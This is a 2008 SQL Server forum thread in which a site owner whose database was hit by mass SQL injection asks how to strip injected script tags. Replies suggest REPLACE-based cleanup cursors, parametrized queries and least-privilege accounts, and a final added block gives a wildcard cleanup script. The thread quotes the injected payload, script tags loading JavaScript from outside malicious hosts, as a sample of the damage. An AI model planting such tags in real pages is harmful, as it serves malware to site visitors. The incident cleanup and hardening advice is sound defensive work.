ethoemmes
Starting Member
3 Posts
Posted - 2008-07-03 : 18:05:03

Hi, My site (and associated SQL Server DB) has been hacked. The ****** seem to have got into my DB and inserted the following at the end of every text field.
quote: <script src=http://www.upcomd.com/ngg.js></script><script src=http://www.upcomd.com/ngg.js></script><script src=http://www.testwvr.com/ngg.js></script>
I'm not very experienced with SQL Server and was wondering if someone could help me write a function to go through every table and field and strip out the bit of javascript above? Will this be possible? Do I need to give any other details? Many thanks for looking
E
jezemine
Master Smack Fu Yak Hacker
2886 Posts
Posted - 2008-07-03 : 18:13:17

have a look at the REPLACE function in BOL.
elsasoft.org
ethoemmes
Starting Member
3 Posts
Posted - 2008-07-03 : 18:16:39

Excuse my ignorance but what is BOL? Thanks for your quick reply - I'm just checking out the replace function now.
E
jezemine
Master Smack Fu Yak Hacker
2886 Posts
SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-07-04 : 00:32:30

And to avoid this in the future, replace all ad-hoc questions with parametrized queries.
E 12°55'05.25"N 56°04'39.16"
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts
Posted - 2008-07-04 : 02:45:05

And lock down the database security so that the web site doesn't have rights to go and update random tables. I would suggest using only stored procedures for data access and modification and ensuring that the web user has only execute rights on the procs and nothing else.
--Gail Shaw
SQL Server MVP
ddcohen
Starting Member
2 Posts
Posted - 2008-07-07 : 07:00:01

I just finished cleaning this up on my site. I found the following page very useful:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
I modified the attack script, as found on that page, and used it to clean up the damage:
---------------------------------
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
-- one row per (table, string column) pair in the current database
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID]
  AND [A].[XType] = 'U' /* Table (User-Defined) */
  AND ([B].[XType] = 99  /* NTEXT */
    OR [B].[XType] = 35  /* TEXT */
    OR [B].[XType] = 231 /* NVARCHAR (SYSNAME columns are stored as xtype 231 too) */
    OR [B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- strip the injected tag from every row of this column
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], ''<script src=http://www.lokriet.com/ngg.js></script>'', '''')')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
--------------------------------------------
Obviously, you have to replace "http://www.lokriet.com/ngg.js" with whatever URL for the malicious script was put into your database.
ethoemmes
Starting Member
3 Posts
Posted - 2008-07-07 : 13:34:17

Thanks ddcohen - much appreciated. I've just noticed that the SQL injections all use different URLs so the simple find and replace doesn't clear all entries. Can anyone help me use a wildcard in the following line to search for all <script src= ????????? </script>
quote: EXEC('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], ''<script src=http://www.lokriet.com/ngg.js></script>'', '''')')
Many thanks for everyone's help on this - I'm slowly learning SQL and it's a great help to see how everyone else does things.
E
ddcohen
Starting Member
2 Posts
Posted - 2008-07-07 : 14:21:44

One follow-up note: As I discovered after my initial post, the "replace" statement will not work on any nText columns. For those, you have to cast to nVarchar (available from SQL Server 2005), do the "replace," and then cast back to nText.
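Putting the wildcard question and this NTEXT note together, as an added example that is not from any poster in this thread: the script below walks every string column of every user table, casts TEXT/NTEXT to NVARCHAR(MAX) so the string functions apply, and removes each <script src=...></script> fragment whatever URL it carries. It assumes SQL Server 2005 or later and that you run it against a restored copy of the database before production; the cursor name and the pattern are my own choices.

```sql
-- Added example (not code from the thread): removes every <script src=...></script>
-- fragment, whatever URL it carries, from all string columns of all user tables.
-- Assumes SQL Server 2005 or later (NVARCHAR(MAX)); test it on a restored copy
-- of the database first and take a fresh backup before touching production.
SET NOCOUNT ON;

DECLARE @Schema SYSNAME, @Table SYSNAME, @Column SYSNAME, @Sql NVARCHAR(MAX);

DECLARE ColCursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT SCHEMA_NAME(t.schema_id), t.name, c.name
    FROM sys.tables AS t
    JOIN sys.columns AS c ON c.object_id = t.object_id
    JOIN sys.types AS ty ON ty.user_type_id = c.user_type_id
    WHERE c.is_computed = 0   -- computed columns cannot be updated
      AND ty.name IN ('char', 'nchar', 'varchar', 'nvarchar',
                      'text', 'ntext', 'sysname');  -- alias types are not covered

OPEN ColCursor;
FETCH NEXT FROM ColCursor INTO @Schema, @Table, @Column;

WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME keeps the identifiers from being read as SQL, and the cast to
    -- NVARCHAR(MAX) is what lets STUFF run on TEXT/NTEXT columns (the result is
    -- implicitly converted back on assignment). Each pass strips the first tag
    -- from every affected row; the loop repeats until no row still matches.
    SET @Sql = N'
    WHILE 1 = 1
    BEGIN
        UPDATE t
        SET ' + QUOTENAME(@Column) + N' = STUFF(v.txt, s.pos, e.pos - s.pos, N'''')
        FROM ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table) + N' AS t
        CROSS APPLY (SELECT CAST(t.' + QUOTENAME(@Column) + N' AS NVARCHAR(MAX))) AS v(txt)
        CROSS APPLY (SELECT PATINDEX(N''%<script src=%</script>%'', v.txt)) AS s(pos)
        CROSS APPLY (SELECT CHARINDEX(N''</script>'', v.txt, s.pos) + 9) AS e(pos)
        WHERE s.pos > 0;
        IF @@ROWCOUNT = 0 BREAK;
    END';

    PRINT N'Cleaning ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table) + N'.' + QUOTENAME(@Column);
    EXEC sp_executesql @Sql;

    FETCH NEXT FROM ColCursor INTO @Schema, @Table, @Column;
END

CLOSE ColCursor;
DEALLOCATE ColCursor;
```

Cleaning the data does not close the hole: the parametrized queries and least-privilege account suggested earlier in the thread are what stop the next run of the same injection.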